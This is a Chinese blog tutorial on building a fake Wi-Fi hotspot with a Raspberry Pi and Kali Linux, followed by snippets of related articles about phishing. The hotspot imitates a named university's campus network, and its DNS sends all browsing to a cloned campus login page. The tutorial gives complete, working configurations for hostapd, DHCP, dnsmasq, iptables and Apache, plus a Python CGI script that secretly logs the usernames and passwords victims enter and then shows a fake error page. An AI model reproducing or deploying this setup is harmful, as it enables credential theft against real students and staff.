树莓派2+无线网卡==伪热点+钓鱼网站

0x1 关于树莓派

The Raspberry Pi is a tiny and affordable computer that you can use to learn programming through fun, practical projects.

树莓派是一个小型的而且很便宜的($35)电脑,在这个电脑上你可以通过有趣的实用的项目学习编程。

树莓派2 Model B长这样:

具体介绍戳官网:Raspberry Pi - Teach, Learn, and Make with Raspberry Pi


0x2 关于系统

树莓派官方出的系统是Raspbian,基于Debian并根据树莓派的硬件进行了优化:

Raspbian is a free operating system based on Debian optimized for the Raspberry Pi hardware.

具体介绍戳官网:Raspbian: FrontPage

当然其他的操作系统,如Ubuntu、Fedora都有针对树莓派的版本。我选的系统是Kali Linux,选它的原因请参考标题。

Kali官方有针对树莓派2的版本,具体安装教程戳官网:Kali Linux – Raspberry Pi | Kali Linux


0x3 关于无线网卡和Micro SD卡

我选的无线网卡是 EDUP EP-N8508GS黄金版 迷你USB无线网卡 树莓派专用,芯片是rtl8188cus,免驱即插即用。

选择无线网卡的时候请参考官网:RPi USB Wi-Fi Adapters

我选的Micro SD卡是 闪迪(SanDisk)32GB UHS-I 至尊高速移动MicroSDHC-TF存储卡(读速48Mb/s)

选择Micro SD卡的时候请参考官网:RPi SD cards


0x4 关于软件

假设已经按照教程安装好了系统,也插上无线网卡了,接下来就是安装必要的软件。

连接树莓派的方式有通过显示器(需要HDMI转接头)、SSH登录、VNC连接等,因为Kali开机自动启动SSH Server,所以只要知道树莓派的IP地址,用SSH连过去就行了,Kali的默认用户名是root,登录密码是toor。

代码前有#的表示在bash下以root身份运行的代码,没有的表示修改的文件内容。

0x41 修改更新源,在/etc/apt/sources.list中添加:

deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

然后进行更新,apt-get update && apt-get upgrade

0x42 根分区扩充

下面链接中的文件可能有更新,请根据需要进入对应目录选择版本

# wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20150131-1_all.deb
# wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armhf.deb
# wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-7.1_armhf.deb
# dpkg -i triggerhappy_0.3.4-2_armhf.deb
# dpkg -i lua5.1_5.1.5-7.1_armhf.deb
# dpkg -i raspi-config_20150131-1_all.deb

然后使用raspi-config命令进入系统设置,选择第一项Expand Filesystem扩充,当然系统设置中还有其他设置,根据需要进行设置即可。用df -lh检查文件系统大小,根分区是否为SD卡大小

0x43 安装和配置hostapd

hostapd的作用是提供无线共享,即配置并成功运行hostapd后,能够搜索到热点

# apt-get install hostapd

由于无线网卡支持的问题,系统安装的hostapd不支持rtl8188cus芯片,需要将hostapd替换为兼容版本:

# wget http://www.daveconroy.com/wp3/wp-content/uploads/2013/07/hostapd.zip
# unzip hostapd.zip 
# sudo mv /usr/sbin/hostapd /usr/sbin/hostapd.bak
# sudo mv hostapd /usr/sbin/hostapd.cat
# sudo ln -sf /usr/sbin/hostapd.cat /usr/sbin/hostapd  
# sudo chmod 755 /usr/sbin/hostapd

修改(没有的话新建)/etc/hostapd/hostapd.conf:

interface=wlan0            
ctrl_interface=wlan0
ctrl_interface_group=0
ssid=BUAA-WIFI                # 伪热点名,例如我的是校园网的WIFI热点名            
channel=2                  
macaddr_acl=0              
ignore_broadcast_ssid=0    
driver=rtl871xdrv         
hw_mode=g                        
wmm_enabled=1

因为是用来钓鱼的伪热点,所以不设置热点密码

修改/etc/default/hostapd,去掉DAEMON_CONF前的注释符号并修改为我们的配置文件路径:

DAEMON_CONF="/etc/hostapd/hostapd.conf"

启动hostapd:

# service hostapd start

0x44 安装和配置isc-dhcp-server

isc-dhcp-server提供的是为接进热点的设备分配IP

# apt-get install isc-dhcp-server

修改/etc/dhcp/dhcpd.conf:

ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;
subnet 192.168.126.112 netmask 255.255.255.240 {    # 创建一个子网
  range 192.168.126.113 192.168.126.125;            # 分配的IP范围
  option domain-name-servers 192.168.126.126;       # 使用本机的DNS服务器
  option domain-name "rpi";    
  option routers 192.168.126.126;                   # 网关为本机
  option broadcast-address 192.168.126.127;         # 广播地址
}

修改/etc/default/isc-dhcp-server:

DHCPD_CONF="/etc/dhcp/dhcpd.conf"
INTERFACES="wlan0"

启动isc-dhcp-server:

# service isc-dhcp-server start

0x45 安装和配置dnsmasq

dnsmasq提供的是为接进热点的设备进行流量引导,Kali中已经安装好dnsmasq了

修改(没有的话新建)/etc/dnsmasq.conf:

interface=wlan0
bind-interfaces
address=/#/192.168.126.126        # 将对所有网站的访问重定向到本机

启动dnsmasq:

# dnsmasq

0x46 添加iptables规则

修改/etc/sysctl.conf:

net.ipv4.ip_forward=1

修改/proc/sys/net/ipv4/ip_forward:

1

添加转发规则:

# sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
# sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

然后用iptables -t nat -S和iptables -S检查是否添加成功

为了让上面的规则在开始时自动添加,执行:

# sh -c "iptables-save > /etc/iptables.ipv4.nat"

0x47 设置wlan0的静态IP

修改/etc/network/interfaces,添加:

auto wlan0
allow-hotplug wlan0
iface wlan0 inet static
        address 192.168.126.126    # 与之前dhcpd.conf填写的网关地址相同
        netmask 255.255.255.240    # 与之前dhcpd.conf填写的子网掩码相同
up iptables-restore < /etc/iptables.ipv4.nat

0x48 安装和配置apache2

apache2提供的是为将重定向的流量引导到本机服务器运行的网页中,Kali中已经安装好apache2了

修改/etc/apache2/sites-available/default,在合适的标签下添加:

<VirtualHost *:80>
    ...
    ServerName gw.buaa.edu.cn             # 伪造服务器名
    DirectoryIndex gw.buaa.edu.cn.html    # 将默认界面改为钓鱼网站页面
    ...
    <Directory "/usr/lib/cgi-bin">
        AddHandler cgi-script .py         # 添加对.py的支持
...

启动apache2:

# service apache2 start

 0x49 编写钓鱼网站

我要钓鱼的是学校的校园网登录网站,所以copy校园网登录的界面,修改里面的表单提交action,提交到本机服务的后台,例如我的钓鱼网站/var/www/gw.buaa.edu.cn.html:

...
<script type="text/javascript">
    function login() {
        var errorMsg = [];
        var username = $("input[name=‘username‘]").val();
        var password = $("input[name=‘password‘]").val();
        if(username == ‘‘ || username == ‘用户名*‘) {
             errorMsg.push(‘请输入用户名.‘);
             $(‘#txtuser‘).focus();
        }
        if (password == ‘‘ || password == ‘密码*‘) {
            errorMsg.push(‘请输入密码.‘);
            $(‘#txtPwd‘).focus();
        }
        if (errorMsg != "") {
            if (errorMsg.length > 0) {
                $(‘#divloginError‘).html(‘‘).html($(‘<ul/>‘, {
                    html: ‘<li>‘ + errorMsg.join(‘</li><li>‘) + ‘</li>‘
                })).show();
                $(‘#dvloginErrorM‘).show();
                $.mobile.silentScroll(125);
            } else {
                $(‘#dvloginErrorM‘).hide();
            }
        } else {
            document.aspnetForm.submit();
        }
    }
</script>
...
<!--表单提交-->
<form name="aspnetForm" method="post" action="/cgi-bin/login.py"...>
<!--用户提交按钮-->
    <a href="javascript:login()".../>
</form>

编写后台处理程序,我用的是python的cgi,在/usr/lib/gci-bin下新建login.py:

#!/usr/bin/python
#-*- encoding: utf-8 -*-
import cgi, cgitb
form = cgi.FieldStorage()
username = form.getvalue(‘username‘)                # 获得用户名
password = form.getvalue(‘password‘)                # 获得密码
f = open(‘/cat/gw.buaa.edu.cn.log‘, ‘a‘)            # 注意apache是否有所写文件夹的权限!!
f.write("%s: %s\r\n" % (username, password))        # 将用户名和密码写入文件
f.close()
print "Content-type:text/html\r\n\r\n"              # 然后显示一个错误页面
print ‘<html><head>‘
print ‘<title>Error 126</title>‘
print ‘</head><body>‘
print ‘<h1>Error establishing a database connection</h1>‘
print ‘</body></html>‘

将login.py的权限设置为755,即有运行权限

0x4A 将上述配置开机自启动

update-rc.d hostapd enable
update-rc.d isc-dhcp-server enable
update-rc.d apache2 enable

对于dnsmasq,需要手动编写开机启动脚本,在/etc/init.d/下新建文件dnsmasq:

#!/bin/bash
set -e
case "$1" in
        start)
                dnsmasq&
                ;;
        stop)
                killall -9 dnsmasq
                ;;
        restart)
                killall -9 dnsmasq
                dnsmasq&
                ;;
esac
exit 0

然后进入/etc/rc3.d/下,执行:

# ln -sf /etc/init.d/dnsmasq S06dnsmasq

S06表示启动优先级,数字越大,优先级越低,比如服务A的运行要依赖服务B,那A的数字就应该大于B的

最后,编辑/etc/rc.local,添加:

service dnsmasq start


0x5 测试运行

首先连接上伪热点BUAA-WIFI,然后在浏览器输入一个网址,浏览器将自动跳转到校园网登录界面:

当用户输入登录的用户名和密码,点击登录后,将跳转到错误页面,但是用户名和密码都已经被后台服务器记录到文件中。

时间: 2024-08-23 22:31:08

树莓派2+无线网卡==伪热点+钓鱼网站的相关文章

SQL注入-攻入Apple ID钓鱼网站实录

之前写的一篇利用SQL注入方式攻击钓鱼网站的文章,现在在博客园再分享一下. 下午,朋友发了一条朋友圈,内容大概这样: 大体就是她的iPhone丢了,收到了钓鱼短信,多么熟悉的套路,如下: 还好她比较机智,发现是个钓鱼网站,地址如下: http://www.apple-icloudid.com.cn 当时看到这件事后,想到之前有巨巨顺势搞定钓鱼网站,所以我也想小试牛刀一下,看看能否攻入钓鱼网站后台. 在试了几轮PHP常见后台地址后,比如/admin,/index.php/admin,均未奏效,索性

剖析泄露你银行卡密码的钓鱼网站:真假“10086”

前言 "网络钓鱼"是指不法分子将网站伪装成真实的银行或电子商务网站来窃取用户银行账号.密码等私密信息的欺诈行为.由于网络钓鱼可窃取个人用户储蓄卡或信用卡账号.密码等信息,导致受害用户蒙受严重的经济损失,该问题一直以来受到广泛的关注.近日小编的一个朋友也遇到假冒10086钓鱼网站,幸好小编朋友的安全意识较高没有上当,小编知道后也去对该假冒10086的钓鱼网站进行分析破解,看看你的个人信息是如何被泄露的. 技术分析 一.网站钓鱼过程 1.0.假冒10086的钓鱼网站 表面上看来跟真实的10

一个没水平的钓鱼网站黑三个人:人们的安全意识和安全知识的缺失

今天,在我的qq好友里面发生这这么一件事情.我的表妹qq被盗,在空间里发了一个钓鱼网站的动态.不久我表妹的表哥的qq空间也发出了同样的动态.过了四五个小时吧,我表弟的空间里也冒出了一样的钓鱼网站动态.最后,还是我去跟他们说清楚情况,让他们通知好友更改密码才结束了这场令人哑然的连环钓鱼攻击. 下面就是动态的内容.大家可以看一下,这段文字稀松平常,说不上多么的高明,只是用上了一点点不成熟的社会工程学罢了.而且这个域名很怪,很容易让人警觉.如果攻击者高明一点,拿到登录权限后,先看一下他qq里的朋友圈,

树莓派配置无线网卡

没耐心看这个Pi支持的无线网卡列表: http://elinux.org/RPi_VerifiedPeripherals#USB_Wi-Fi_Adapters 我就用自己之前买的一的斐讯的USB无线网卡,很小,35元还特么包邮!用的也很好! 插上去就能识别,而且,我是直接用USB线插在笔记上取的电,500mA也能带得动整个板子.(但是要先插上无线网卡,再上电) 用lsusb命令,就可以看到:  然后再用ifconfig,看到wlan0已经出现了:  那么,我们所需要做的只有一件事,修改/etc/

4月共处理钓鱼网站6406个:非CN域名达6114个

IDC评述网(idcps.com)05月09日报道:根据中国反钓鱼网站联盟公布的<2014年4月钓鱼网站处理简报>显示,4月份,联盟共处理钓鱼网站6406个,截至2014年4月份,联盟累计认定并处理钓鱼网站178020个.下面,IDC评述网与大家一起关注4月钓鱼网站处理情况. (1)钓鱼网站举报来源情况 4月联盟成员单位举报的钓鱼网站数量占到了总举报量的86.17%.而由12321网络不良与垃圾信息举报受理中心转来的钓鱼网站数量占4月处理量的13.22%.该比例近一个月以来呈现下降趋势. (2

10月理钓鱼网站简报:非CN域名9743个 环比涨5.5倍

IDC评述网(idcps.com)11月17日报道:近日,中国反钓鱼网站联盟发布了<2015年10月钓鱼网站处理简报>.据报告显示,10月份,联盟共处理钓鱼网站10193个,环比上月约增加566%,上升幅度十分明显.截至2015年10月份,联盟累计认定并处理钓鱼网站256149个.下面,请看IDC评述网对相关数据的整理与分析. 1.钓鱼网站举报来源情况 在9月,钓鱼网站举报来源主要是联盟成员.社会举报.联盟自查.12321举报中心.其中,联盟成员比重依旧最大,占了72.57%.社会举报次之,占

易维信(EVTrust)支招五大技巧识别钓鱼网站

网上购物和网上银行凭借其便捷性和通达性,在互联网上日渐流行.在互联网上,你可以随时进行转账汇款或进行交易.据艾瑞咨询发布<2008-2009年中国网上支付行业发展报告>显示:中国互联网支付市场交易规模2008年同比增长181%,达到2743亿元,成为互联网发展最快的行业.其中,网络购物.航空客票占据了半壁江山. 当人们享受在线购物和支付便利的时候,你必须要警惕网络钓鱼的陷阱.当不法分子以假冒银行网站或购物网站等形式,诱骗客户输入银行卡号.密码.口令或是个人身分重要数据等,盗取客户资金或信息以实

2015年12月钓鱼网站域名涉及注册商分析:阿里居首

IDC评述网(idcps.com)01月14日报道:近日,中国反钓鱼网站联盟发布了<2015年12月钓鱼网站处理简报>.据报告显示,12月份,联盟共处理钓鱼网站14900个,环比11月上升了95%,增幅明显.截止至2015年12月,联盟累计认定并处理钓鱼网站278693个.接下来,请看IDC评述网整理的12月钓鱼网站处理情况. 1.钓鱼网站举报来源情况 2015年12月钓鱼网站举报主要来源有联盟成员.联盟自查.12321举报中心.社会举报.其中,联盟成员举报的钓鱼网站数量占总举报量的89.95

钓鱼网站以世界杯足球赛为饵,收集个人资料

2014年巴西世界杯足球赛正在火热进行中,针对此事件的垃圾邮件也开始倾巢而出.比如试图用奖金500万巴西币(相当于220万美元)的赌球活动等方式来诱惑用户的信息不胜枚举. (图一.钓鱼邮件) 典型网络钓鱼攻击分为三个阶段.首先,使用者连上钓鱼网站,个人资料被收集.在这起案例中,被窃取的数据包括:信用卡号码.信用卡验证码(CVV).到期年月.发卡银行 .网银密码.用户电子邮件地址 . 在第二阶段,PHP档案会将所有撷取的数据储存在恶意网站上的一个文本文件. (图二.PHP程序代码) 在这起案例中,